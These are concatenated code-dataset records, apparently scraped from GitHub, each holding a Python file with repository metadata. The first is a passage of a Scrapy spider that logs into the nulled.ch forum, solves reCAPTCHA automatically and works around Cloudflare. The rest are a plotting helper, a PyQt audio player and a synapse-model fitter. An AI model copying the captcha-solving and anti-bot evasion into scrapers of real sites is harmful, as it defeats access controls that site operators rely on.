cookies=cookies,\n )\n\n def proceed_for_login(self, response):\n # Synchronize user agent for cloudfare middleware\n self.synchronize_headers(response)\n my_post_key = response.xpath(\n '//input[@name=\"my_post_key\"]/@value').extract_first()\n self.logger.info('my_post_key')\n self.logger.info(my_post_key)\n formdata = {\n \"username\": USERNAME,\n \"password\": PASSWORD,\n \"remember\": \"yes\",\n \"submit\": \"Login\",\n \"action\": \"do_login\",\n \"url\": \"\",\n \"g-recaptcha-response\": self.solve_recaptcha(response).solution.token,\n \"my_post_key\": my_post_key\n }\n self.logger.info(formdata)\n yield FormRequest.from_response(\n response,\n formxpath=self.login_form_xpath,\n formdata=formdata,\n meta=self.synchronize_meta(response),\n dont_filter=True,\n headers=self.headers,\n callback=self.parse_start\n )\n\n def parse_start(self, response):\n # Synchronize cloudfare user agent\n self.synchronize_headers(response)\n\n # Check if login failed\n self.check_if_logged_in(response)\n \n all_forums = response.xpath(self.forum_xpath).extract()\n\n # update stats\n self.crawler.stats.set_value(\"mainlist/mainlist_count\", len(all_forums))\n if not all_forums:\n self.logger.info(response.text)\n for forum_url in all_forums:\n\n # Standardize url\n if self.base_url not in forum_url:\n forum_url = self.base_url + forum_url\n 
if 'forum-178.html' not in forum_url:\n continue\n\n yield Request(\n url=forum_url,\n headers=self.headers,\n callback=self.parse_forum,\n meta=self.synchronize_meta(response),\n )\n\n def parse_thread(self, response):\n\n # Parse generic thread\n yield from super().parse_thread(response)\n\n # Parse generic avatar\n yield from super().parse_avatars(response)\n\n\nclass NulledChScrapper(SiteMapScrapper):\n\n spider_class = NulledChSpider\n site_name = 'nulled.ch'\n site_type = 'forum'\n", "repo_name": "ken2190/Enterprise-Forum-Scraper", "sub_path": "scraper/nulled_ch.py", "file_name": "nulled_ch.py", "file_ext": "py", "file_size_in_byte": 6141, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scraper.base_scrapper.SitemapSpider", "line_number": 36, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 73, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 75, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 77, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.ChromeOptions", "line_number": 95, "usage_type": "call"}, {"api_name": "scraper.base_scrapper.PROXY", "line_number": 99, "usage_type": "name"}, {"api_name": "scraper.base_scrapper.PROXY_USERNAME", "line_number": 99, "usage_type": "name"}, {"api_name": "scraper.base_scrapper.PROXY_PASSWORD", "line_number": 99, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 110, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 120, "usage_type": "call"}, {"api_name": "scrapy.FormRequest.from_response", "line_number": 146, "usage_type": "call"}, {"api_name": "scrapy.FormRequest", "line_number": 146, "usage_type": "name"}, {"api_name": "scrapy.Request", "line_number": 177, "usage_type": "call"}, {"api_name": "scraper.base_scrapper.SiteMapScrapper", "line_number": 193, "usage_type": "name"}]} +{"seq_id": "36517577422", "text": "from typing import List\n\nimport matplotlib.patches as mpatches\n\nfrom utils.StatisticsCalculator import Statistic\n\nclass PlotDrawer:\n def draw(self, stats: List[Statistic], plotter, canvas):\n if len(stats) > 0:\n plotter.clear()\n plotter.set_ylabel('Distance')\n plotter.set_xlabel('Generation number')\n plotter.grid()\n x = [i for i in range(0, len(stats))]\n best = [stat.best for stat in stats]\n worst = [stat.worst for stat in stats]\n avg = [stat.avg for stat in stats]\n plotter.plot(x, best)\n plotter.plot(x, worst)\n plotter.plot(x, avg)\n best_legend = mpatches.Patch(color=\"blue\", label=\"Best\")\n avg_legend = mpatches.Patch(color=\"orange\", label=\"Worst\")\n worst_legend = mpatches.Patch(color=\"green\", label=\"Avg\")\n plotter.legend(handles=[best_legend, avg_legend, worst_legend])\n canvas.draw()\n", "repo_name": "Suqu13/SI_1", "sub_path": "utils/PlotDrawer.py", "file_name": "PlotDrawer.py", "file_ext": "py", "file_size_in_byte": 981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "utils.StatisticsCalculator.Statistic", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.patches.Patch", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 21, "usage_type": "name"}, 
{"api_name": "matplotlib.patches.Patch", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.patches.Patch", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "34440192701", "text": "import sys\nimport os\n\nimport sqlite3\nimport audioplayer\n\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDialog, QWidget, QFileDialog\n\nfrom interface import *\n\nif hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'):\n QtWidgets.QApplication.setAttribute(\n QtCore.Qt.AA_EnableHighDpiScaling, True)\n\nif hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'):\n QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)\n\n\n# Globals\nProfileId = 0\nok = True\n\n\nclass ProfileSelection(QDialog, Ui_ProfileSelection):\n def __init__(self, con, cur):\n super().__init__()\n self.setupUi(self)\n self.con = con\n self.cur = cur\n self.btn_del.clicked.connect(self.deleteProfile)\n self.btn_new.clicked.connect(self.createProfile)\n self.btn_open.clicked.connect(self.openProfile)\n self.update()\n\n def update(self):\n self.combo.clear()\n data = [x[0] for x in self.cur.execute(\n \"\"\"SELECT Profile.Title FROM Profile\"\"\").fetchall()]\n self.combo.addItems(data)\n\n def deleteProfile(self):\n try:\n id = self.cur.execute(\n \"\"\"\n SELECT Profile.ProfileId FROM Profile\n WHERE Profile.Title == ?\n \"\"\",\n (self.combo.currentText(), )\n ).fetchone()[0]\n self.cur.execute(\n \"DELETE FROM Profile WHERE Profile.ProfileId == ?\", (id,))\n self.cur.execute(\n \"DELETE FROM Audio WHERE Audio.ProfileId == ?\", (id,))\n self.con.commit()\n self.update()\n except Exception:\n return\n\n def createProfile(self):\n NewProfile(self.con, self.cur).exec()\n self.update()\n self.combo.setCurrentIndex(self.combo.count() - 1)\n\n def openProfile(self):\n if self.combo.count() == 0:\n return\n global ProfileId\n ProfileId = self.cur.execute(\n \"\"\"\n SELECT Profile.ProfileId FROM Profile\n WHERE Profile.Title = ?\n \"\"\",\n (self.combo.currentText(),),\n ).fetchone()[0]\n self.close()\n\n\nclass NewProfile(QDialog, Ui_NewProfile):\n def __init__(self, con, cur):\n super().__init__()\n self.setupUi(self)\n self.con = con\n self.cur = cur\n self.btn_save.clicked.connect(self.saveProfile)\n self.btn_back.clicked.connect(self.close)\n\n def saveProfile(self):\n txt = self.line.text()\n if len(txt) == 0:\n return\n self.cur.execute(\"INSERT INTO Profile(Title) VALUES(?)\", (txt,))\n self.con.commit()\n self.close()\n\n\nclass ProfileInterface(QMainWindow, Ui_ProfileInterface):\n def __init__(self, db=\"db.sqlite\"):\n global ok\n super().__init__()\n self.setupUi(self)\n self.btn_add_audio.clicked.connect(self.addAudio)\n self.btn_del_audio.clicked.connect(self.delAudio)\n self.btn_new_sequence.clicked.connect(self.addSequence)\n self.btn_del_sequence.clicked.connect(self.delSequence)\n self.btn_append.clicked.connect(self.addSequenceAudio)\n self.btn_pop.clicked.connect(self.delSequenceAudio)\n self.player_btn.clicked.connect(self.startPlayer)\n self.combo.currentTextChanged.connect(self.updateSequenceList)\n self.con = sqlite3.connect(db)\n self.cur = self.con.cursor()\n f_in = open(\"startup.txt\", \"rt\", encoding=\"utf8\")\n data = int(f_in.read()[0])\n if data == 1:\n ok = False\n f_out = open(\"startup.txt\", \"w\", encoding=\"utf8\")\n print(0, file=f_out)\n 
f_out.close()\n self.hide()\n Hello().exec()\n if not ok:\n self.close()\n f_in.close()\n ProfileSelection(self.con, self.cur).exec()\n self.setWindowTitle(self.cur.execute(\n \"\"\"\n SELECT Profile.Title FROM Profile\n WHERE Profile.ProfileId == ?\n \"\"\",\n (ProfileId,)\n ).fetchone()[0])\n self.update_audio()\n self.updateCombo()\n self.updateSequenceList()\n\n def update_audio(self):\n self.audio_list.clear()\n table_data = self.cur.execute(\n \"\"\"\n SELECT Audio.Title FROM Audio\n WHERE Audio.ProfileId == ?\n \"\"\",\n (ProfileId,)\n ).fetchall()\n self.audioList = [x[0] for x in self.cur.execute(\n \"\"\"\n SELECT Audio.AudioId FROM Audio\n INNER JOIN Profile\n ON Audio.ProfileId = Profile.ProfileId\n \"\"\"\n ).fetchall()]\n table_data = [x[0] for x in table_data]\n if len(table_data) > 0:\n self.audio_list.addItems(table_data)\n\n def updateSequenceList(self):\n self.sequence_list.clear()\n try:\n self.SequenceId = self.cur.execute(\n \"\"\"\n SELECT Sequence.SequenceId FROM Sequence\n WHERE Sequence.Title == ?\n \"\"\", (self.combo.currentText(), )\n ).fetchone()[0]\n self.currentSequence = self.cur.execute(\n \"\"\"\n SELECT Audio.Title, Audio.Path FROM Audio\n INNER JOIN AudioSequence\n ON Audio.AudioId = AudioSequence.AudioId\n WHERE AudioSequence.SequenceId = ?\n ORDER BY AudioSequence.i\n \"\"\", (self.SequenceId, )\n ).fetchall()\n self.iMax = len(self.currentSequence)\n self.sequence_list.clear()\n table_data = [data[0] for data in self.currentSequence]\n if len(table_data) > 0:\n self.sequence_list.addItems(table_data)\n except Exception:\n return\n\n def addSequenceAudio(self):\n self.cur.execute(\n \"\"\"\n INSERT INTO AudioSequence(AudioId, i, SequenceId)\n VALUES(?, ?, ?)\n \"\"\",\n (self.audioList[self.audio_list.currentRow()],\n self.iMax, self.SequenceId)\n )\n self.con.commit()\n self.updateSequenceList()\n\n def delSequenceAudio(self):\n self.cur.execute(\n \"\"\"\n DELETE FROM AudioSequence\n WHERE AudioSequence.SequenceId == ? AND AudioSequence.i == ?\n \"\"\",\n (self.SequenceId, self.iMax - 1)\n )\n self.con.commit()\n self.updateSequenceList()\n\n def updateCombo(self):\n self.combo.clear()\n data = [x[0] for x in self.cur.execute(\n \"\"\"\n SELECT Sequence.Title FROM Sequence\n WHERE Sequence.ProfileId == ?\n \"\"\",\n (ProfileId,)\n ).fetchall()]\n self.combo.addItems(data)\n\n def addAudio(self):\n NewAudio(self.con, self.cur).exec()\n self.update_audio()\n\n def delAudio(self):\n if not self.audio_list.currentItem():\n return\n self.cur.execute(\n \"\"\"\n DELETE FROM Audio\n WHERE Audio.ProfileId = ? AND Audio.Title = ?\n \"\"\",\n (ProfileId, self.audio_list.currentItem().text())\n )\n self.cur.execute(\n \"\"\"\n DELETE FROM AudioSequence\n WHERE AudioSequence.AudioId in (\n SELECT Audio.AudioId FROM Audio\n WHERE Audio.ProfileId = ? 
AND Audio.Title = ?\n )\n \"\"\",\n (ProfileId, self.audio_list.currentItem().text())\n )\n self.con.commit()\n self.update_audio()\n\n def addSequence(self):\n NewSequence(self.con, self.cur).exec()\n self.updateCombo()\n self.combo.setCurrentIndex(self.combo.count() - 1)\n\n def delSequence(self):\n try:\n self.cur.execute(\n \"DELETE FROM AudioSequence WHERE AudioSequence.SequenceId == ?\", (self.SequenceId,))\n self.cur.execute(\n \"DELETE FROM Sequence WHERE Sequence.SequenceId == ?\", (self.SequenceId,))\n self.con.commit()\n self.updateCombo()\n except Exception:\n return\n\n def startPlayer(self):\n nw = Player(self.currentSequence)\n nw.exec()\n nw.stop()\n\n\nclass NewAudio(QDialog, Ui_NewAudio):\n def __init__(self, con, cur):\n super().__init__()\n self.setupUi(self)\n self.con = con\n self.cur = cur\n self.btn_select_path.clicked.connect(self.getPath)\n self.btn_cancel.clicked.connect(self.close)\n self.btn_save.clicked.connect(self.saveAudio)\n\n def getPath(self):\n self.audio_path.setText(QFileDialog.getOpenFileName(\n self, 'Выбрать аудиофайл', '', \"Аудио (*.mp3);;Все файлы (*)\")[0])\n\n def saveAudio(self):\n path = self.audio_path.text()\n title = self.audio_title.text()\n if not (os.path.isfile(path)) or len(title) == 0:\n return\n self.cur.execute(\n \"\"\"\n INSERT INTO Audio(Title, Path, ProfileId)\n VALUES(?,?,?)\n \"\"\",\n (title, path, ProfileId)\n )\n self.con.commit()\n self.close()\n\n\nclass NewSequence(QDialog, Ui_NewSequence):\n def __init__(self, con, cur):\n super().__init__()\n self.setupUi(self)\n self.con = con\n self.cur = cur\n self.btn_save.clicked.connect(self.saveProfile)\n self.btn_back.clicked.connect(self.close)\n\n def saveProfile(self):\n txt = self.line.text()\n if len(txt) == 0:\n return\n self.cur.execute(\n \"INSERT INTO Sequence(Title, ProfileId) VALUES(?, ?)\",\n (txt, ProfileId)\n )\n self.con.commit()\n self.close()\n\n\nclass Player(QDialog, Ui_Player):\n def __init__(self, data):\n super().__init__()\n self.setupUi(self)\n self.playing = False\n self.data = data\n self.i = 0\n self.current_snd = audioplayer.AudioPlayer(self.data[self.i][1])\n self.current_snd.play(loop=True)\n self.current_snd.pause()\n self.update_songs()\n self.pause_btn.clicked.connect(self.pauseresume)\n self.next_btn.clicked.connect(self.forward)\n self.prev_btn.clicked.connect(self.backwards)\n\n def pauseresume(self):\n self.playing ^= True\n if self.playing:\n self.pause_btn.setText(\"⏸\")\n self.current_snd.resume()\n else:\n self.pause_btn.setText(\"⏵\")\n self.current_snd.pause()\n\n def update_songs(self):\n self.prev.clear()\n self.now_playing.clear()\n self.next.clear()\n if (self.i > 0):\n self.prev.setText(self.data[self.i - 1][0])\n self.now_playing.setText(self.data[self.i][0])\n if (self.i < len(self.data) - 1):\n self.next.setText(self.data[self.i + 1][0])\n\n def forward(self):\n if self.i >= len(self.data) - 1:\n return\n self.i += 1\n self.current_snd.close()\n self.current_snd = audioplayer.AudioPlayer(self.data[self.i][1])\n self.current_snd.play(loop=True)\n if not self.playing:\n self.current_snd.pause()\n self.update_songs()\n\n def backwards(self):\n if self.i <= 0:\n return\n self.i -= 1\n self.current_snd.close()\n self.current_snd = audioplayer.AudioPlayer(self.data[self.i][1])\n self.current_snd.play(loop=True)\n if not self.playing:\n self.current_snd.pause()\n self.update_songs()\n\n def stop(self):\n self.current_snd.close()\n\n\nclass Hello(QDialog, Ui_Hello):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n 
self.pixmap = QPixmap(\"resources/kotik.gif\")\n self.image.setPixmap(self.pixmap)\n self.btn_hello.clicked.connect(self.stop)\n self.audio = audioplayer.AudioPlayer(\"resources/privet.mp3\")\n self.audio.play(loop=True)\n\n def stop(self):\n global ok\n ok = True\n self.audio.close()\n self.close()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = ProfileInterface()\n ex.show()\n sys.exit(app.exec_())\n", "repo_name": "erytw/SoundBar", "sub_path": "app/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 12318, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PyQt5.QtCore.Qt", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 13, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.setAttribute", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 14, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 15, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 17, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 17, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.setAttribute", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 80, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 98, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 266, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 277, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 277, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 283, "usage_type": "call"}, {"api_name": "os.path", "line_number": 283, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 296, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 317, "usage_type": "name"}, {"api_name": "audioplayer.AudioPlayer", "line_number": 324, "usage_type": "call"}, {"api_name": "audioplayer.AudioPlayer", "line_number": 356, "usage_type": "call"}, {"api_name": "audioplayer.AudioPlayer", "line_number": 367, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 377, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 381, "usage_type": "call"}, {"api_name": "audioplayer.AudioPlayer", "line_number": 384, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 395, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 395, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 398, "usage_type": "call"}]} +{"seq_id": "15301574382", "text": "# -*- coding: utf-8 -*-\n\"\"\"Classes for updating synapse models to fit 
data\n\"\"\"\nfrom __future__ import annotations\n\nimport abc\nfrom numbers import Number\nimport re\nfrom typing import Any, Callable, Dict, List, Optional, Tuple\n\nimport numpy as np\n\nimport numpy_linalg as la\nimport sl_py_tools.arg_tricks as _ag\nimport sl_py_tools.iter_tricks as _it\nimport sl_py_tools.options_classes as _opt\n\nimport complex_synapse.identify.plast_seq as _ps\nimport complex_synapse.identify.synapse_id as _si\n\n# =============================================================================\nMESSAGES = (\n \"Failure, maximum iterations reached.\",\n \"Success, changes in log-likelihood and model estimate below threshold.\",\n \"Error, invalid model generated.\",\n)\n_FSPEC = re.compile(r'(\\w*?)(\\d?),(\\d?)')\n\ndef _like_str(model: str = '') -> str:\n \"\"\"TeX string for likelihood\"\"\"\n return f\"P(\\\\text{{{{data}}}}|\\\\mathbf{{{{M}}}}{model})\"\n\n\ndef _frmt_vars(format_spec: str) -> Tuple[Dict[str, str], str, str, str]:\n \"\"\"Variables for __format__ method\"\"\"\n if format_spec == \"tex\":\n return {\"t\": \"t &= {nit:d}\",\n \"tr\": \"-\\\\log \" + _like_str(\"^*\") + \" &= {true_like:.0f}\",\n \"fit\": \"-\\\\log \" + _like_str() + \" &= {nlike:.0f}\",\n \"trx\": (\"\\\\lVert\\\\mathbf{{M}}^*-\\\\mathbf{{M}}\\\\rVert &= \"\n + \"{true_dmodel:.2f}\"),\n \"dtr\": (\"\\\\log\\\\frac{{\" + _like_str('^*') + \"}}{{\"\n + _like_str() + \"}} &= {true_dlike:.0f}\"),\n \"df\": \"\\\\Delta\\\\log \" + _like_str() + \" &= {dlike:.2g}\",\n \"dx\": \"\\\\lVert\\\\Delta\\\\mathbf{{M}}\\\\rVert &= {dmodel:.2g}\",\n \"df-\": \"\\\\Delta\\\\log \" + _like_str() + \" &= -\",\n \"dx-\": \"\\\\lVert\\\\Delta\\\\mathbf{{M}}\\\\rVert &= -\",\n }, \"\\\\begin{align*} \", \" ,\\\\\\\\ \", \". \\\\end{align*}\"\n return {\"t\": \"nit = {nit}\",\n \"tr\": \"-log P(data|true) = {true_like:.3f}\",\n \"fit\": \"-log P(data|fit) = {nlike:.3f}\",\n \"trx\": \"\\n||true-fit|| = {true_dmodel:.3g}\",\n \"dtr\": \"log[P(data|true) / P(data|fit)] = {true_dlike:.3g}\",\n \"df\": \"\\nlog[P(data|fit) / P(data|prev)] = {dlike:.3g}\",\n \"dx\": \"||fit-prev|| = {dmodel:.3g}\",\n \"df-\": \"\\nlog[P(data|fit) / P(data|prev)] = ---\",\n \"dx-\": \"||fit-prev|| = ---\",\n }, \"\", \", \", \"\"\n\n\ndef _get_pos_verbosity(obj: SynapseFitter, format_spec: str):\n \"\"\"Read pos & verbosity from format_spec if possible else from obj\"\"\"\n fspec = _FSPEC.fullmatch(format_spec)\n if fspec is not None:\n format_spec = fspec[1]\n if fspec is None or not fspec[2]:\n # not from a callback, so not during\n pos = 2 * np.isfinite(obj.info['dlike'])\n else:\n pos = int(fspec[2])\n if fspec is None or not fspec[3]:\n verbose = obj.opt.disp_when()[pos] == 2\n else:\n verbose = fspec[3] == '2'\n return format_spec, pos, verbose\n\n\ndef print_callback(obj: SynapseFitter, pos: int) -> List:\n \"\"\"Callback that prints fitter state as appropriate\n\n Parameters\n ----------\n obj : SynapseFitter\n Object performing fit whose state we print.\n pos : int\n At what stage of the fit are we?\n 0: Before first iteration.\n 1: During itertions.\n 2: After completion.\n \"\"\"\n fmt = f\"{pos},{obj.opt.disp_when()[pos]}\"\n if pos == 0 and obj.opt.disp_before:\n gap = ('',) if obj.opt.disp_each else ()\n print('Before:', format(obj, fmt), *gap, sep='\\n')\n elif pos == 1 and obj.opt.disp_each:\n print('*', format(obj, fmt))\n elif pos == 2 and obj.opt.disp_after:\n gap = ('',) if obj.opt.disp_each or obj.opt.disp_before else ()\n print(*gap, 'After:', format(obj, fmt), MESSAGES[obj.info['result']],\n 
sep='\\n')\n return []\n\n\n# =============================================================================\n# Options class for synapse model fitters\n# =============================================================================\n\n\n# pylint: disable=too-many-ancestors\nclass SynapseFitOptions(_opt.Options):\n \"\"\"Options for synapse fitters\n\n The individual options can be accessed as object instance attributes\n (e.g. `obj.name`) or as dictionary items (e.g. `obj['name']`) for both\n getting and setting.\n\n Parameters\n ----------\n atolx : float = 1e-5\n Absolute tolerance for `dmodel`.\n atoly : float = 1e-5\n Absolute tolerance for `dlike`.\n rtolx : float = 1e-5\n Relative tolerance for `dmodel`. Multiplies `x_scale` if given.\n rtoly : float = 1e-5\n Relative tolerance for `dlike`. Multiplies `y_scale` if given.\n max_it : int = 1000\n Maximum number of iterations\n verbosity : int[0:27] = 0\n When statistics are printed, and how verbose:\n 0: do not print\n 1: after iteration\n 2: after iteration, detailed\n 3: before iteration\n 6: before iteration, detailed\n 9: each iteration\n 18: each iteration, detailed\n Values in different categories can be summed to produce combinations\n disp_step : int = 50\n Display progress update every `disp_step` iterations.\n\n All parameters are optional keywords. Any dictionary passed as positional\n parameters will be popped for the relevant items. Keyword parameters must\n be valid keys, otherwise a `KeyError` is raised.\n\n Properties\n ----------\n disp_before : int\n Display before starting iteration?\n disp_each : int\n Display at each iteration?\n disp_after : int\n Display after the end of iteration?\n They are interpreted as: 0=do not print, 1=print summary, 2=print detailed.\n They are related to `verbose` as `verbose = after + 3 * before + 9 * each`.\n \"\"\"\n prop_attributes: _opt.Attrs = ('disp_after', 'disp_before', 'disp_each')\n key_last: _opt.Attrs = ('disp_after', 'disp_before', 'disp_each')\n # Absolute tolerance for `dmodel`.\n atolx: float\n # Absolute tolerance for `dlike`.\n atoly: float\n # Relative tolerance for `dmodel`. Multiplies `x_scale` if given.\n rtolx: float\n # Relative tolerance for `dlike`. 
Multiplies `y_scale` if given.\n rtoly: float\n # Maximum number of iterations\n max_it: int\n # When statistics are printed, and how verbose:\n verbosity: int\n # Display progress update every `disp_step` iterations.\n disp_step: int\n\n def __init__(self, *args, **kwds) -> None:\n self.atolx = 1e-4\n self.atoly = 1e-4\n self.rtolx = 1e-4\n self.rtoly = 1e-4\n self.max_it = 1000\n self.verbosity = 1\n self.disp_step = 50\n # args = _opt.sort_dicts(args, self.prop_attributes, -1)\n # kwds = _opt.sort_dict(kwds, self.prop_attributes, -1)\n super().__init__(*args, **kwds)\n\n def set_disp_after(self, value: int) -> None:\n \"\"\"Display after the end of iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n if not 0 <= value < 3:\n raise ValueError(f\"Allowed values: 0,1,2, not {value}.\")\n change = value - self.disp_after\n if change:\n self.verbosity += change\n\n def set_disp_before(self, value: int) -> None:\n \"\"\"Display before starting iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n if not 0 <= value < 3:\n raise ValueError(f\"Allowed values: 0,1,2, not {value}.\")\n change = value - self.disp_after\n if change:\n self.verbosity += change * 3\n\n def set_disp_each(self, value: int) -> None:\n \"\"\"Display at each iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n if not 0 <= value < 3:\n raise ValueError(f\"Allowed values: 0,1,2, not {value}.\")\n change = value - self.disp_after\n if change:\n self.verbosity += change * 9\n\n @property\n def disp_after(self) -> int:\n \"\"\"Display after the end of iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n return self.verbosity % 3\n\n @property\n def disp_before(self) -> int:\n \"\"\"Display before starting iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n return (self.verbosity // 3) % 3\n\n @property\n def disp_each(self) -> int:\n \"\"\"Display at each iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n return (self.verbosity // 9) % 3\n\n def disp_when(self) -> Tuple[int, int, int]:\n \"\"\"Tuple of (disp_before, disp_each, disp_after)\"\"\"\n return self.disp_before, self.disp_each, self.disp_after\n\n\n# =============================================================================\n# Base class for synapse model fitters\n# =============================================================================\n\n\nclass SynapseFitter(abc.ABC):\n \"\"\"Base class for synapse fitters.\n\n Parameters\n ----------\n data : PlasticitySequence\n The data used to fit the synapse model.\n est : SynapseIdModel\n The initial guess/current estimate of the synapse model.\n callback : Callable[[self, int]->None], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n Other keywords added to `self.opts` below.\n\n Other Attributes\n ----------------\n prev_model : Optional[SynapseIdModel]\n During iteration or after error: Previous model estimate.\n Otherwise: `None`.\n info : Dict[str, Number]\n Statistics of current state. See below.\n opt : SynapseFitOptions\n Options for iteration and termination. 
See below.\n\n Statistics\n ----------\n nlike : float\n Negative log-likelihood of `data` given `model`.\n dlike : float\n Decrease in negative log-likelihood of `data` given `model`.\n dmodel : float\n Distance between `model` and `prev_model`.\n nit : int\n Number of updates performed.\n x_thresh : float\n Threshold on `dmodel` for termination.\n y_thresh : float\n Threshold on `dlike` for termination.\n x_scale : float or None\n Typical scale for `dmodel`. By default, `None` -> `est.norm()`.\n y_scale : float or None\n Typical scale for `dlike`. By default, `None` -> `nlike`.\n result : int\n Flag for the outcome of fitting:\n -1: Error, invalid model generated.\n 0: Failure, maximum iterations reached.\n 1: Success, change in log-likelihood and model below threshold.\n All of the above are stored in `self.info`.\n\n Options\n -------\n atolx : float = 1e-5\n Absolute tolerance for `dmodel`.\n atoly : float = 1e-5\n Absolute tolerance for `dlike`.\n rtol : float = 1e-5\n Relative tolerance. Multiplies `x_scale` and `y_scale` if given.\n max_it : int = 1e3\n Maximum number of iterations\n verbosity : int = -2\n When statistics are printed, and how verbose:\n 0: do not print\n 1: after iteration\n 2: after iteration, detailed\n 3: before iteration\n 6: before iteration, detailed\n 9: each iteration\n 18: each iteration, detailed\n Values in different categories can be summed to produce combinations\n disp_step : int = -2\n Display progress update every `disp_step` iterations.\n All of the above are stored in `SynapseFitter.opt`.\n\n See Also\n --------\n SynapseFitOptions.\n \"\"\"\n data: _ps.PlasticitySequence\n est: _si.SynapseIdModel\n prev_est: Optional[_si.SynapseIdModel]\n # Stats of current state:\n info: Dict[str, Number]\n # options:\n opt: SynapseFitOptions\n # callback to report on each step/result\n callback: Callback\n\n def __init__(self, data: _ps.PlasticitySequence, est: _si.SynapseIdModel,\n callback: Callback = print_callback, **kwds) -> None:\n \"\"\"Base class for synapse fitters.\n\n Parameters\n ----------\n data : PlasticitySequence\n The data used to fit the synapse model.\n est : SynapseIdModel\n The initial guess/current estimate of the synapse model\n callback : Callable[[self, int]->None], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n\n Subclass should set `self.info['nlike']`.\n \"\"\"\n self.data = data\n self.est = est\n self.prev_est = None\n self.info = {'nit': 0, 'nlike': np.inf, 'dmodel': np.inf,\n 'dlike': np.inf, 'x_thresh': 0., 'y_thresh': 0.,\n 'x_scale': None, 'y_scale': None}\n self.opt = kwds.pop('opt', SynapseFitOptions())\n self.opt.update(**kwds)\n self.callback = callback\n\n def __format__(self, format_spec: str) -> str:\n \"\"\"Printing info about state of fitter\n\n Parameters\n ----------\n format_spec : str\n If it begins `'tex'`, produces a LaTeX equation environment.\n If it ends with `','`, the first digit is\n interpreted as `pos` and the second as `verbose`.\n\n For `pos`:\n 0: Before first iteration.\n 1: During itertions.\n 2: After completion.\n For `verbose`:\n 1: print summary,\n 2: print detailed.\n \"\"\"\n format_spec, pos, verbose = _get_pos_verbosity(self, format_spec)\n disp = ['t', 'fit']\n if verbose and pos:\n disp += ['df', 'dx']\n elif verbose and not format_spec:\n disp += 